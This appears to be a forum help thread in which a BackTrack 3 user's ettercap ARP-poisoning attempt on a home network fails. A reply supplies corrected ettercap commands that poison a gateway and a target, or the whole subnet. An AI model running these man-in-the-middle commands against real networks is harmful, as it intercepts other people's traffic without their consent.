    Default Etercap doesnt seem to be working

    need help on my scenario, can't get etercap to work. I have Bt3 on laptop - madwifi driver on Linksys PCMCI wifi adapter. I connect to my network, my IP 192.168.1.105; target machine XP (or another BT3 laptop) IP 192.168.1.104..

    I'm running --> ettercap -Tq -M arp:remote -i ath0 /192.168.1.104/
    nothing happens when I browse on the other machine, etc. etercap doesn't show anything hapenning.

    here's the shell output:

    ps ~ # ifconfig

    Your missing target number 2.Try this

    Code:
    ettercap -Tq -M arp:remote -i ath0 /192.168.1.1/ /192.168.1.104/

    or
    Code:
    ettercap -Tq -M arp:remote -i ath0 // //

    If there are a lot of computers on the network, then this could potentially slow down the network to a crawl. It is best just to target one or two computers rather then the whole network.
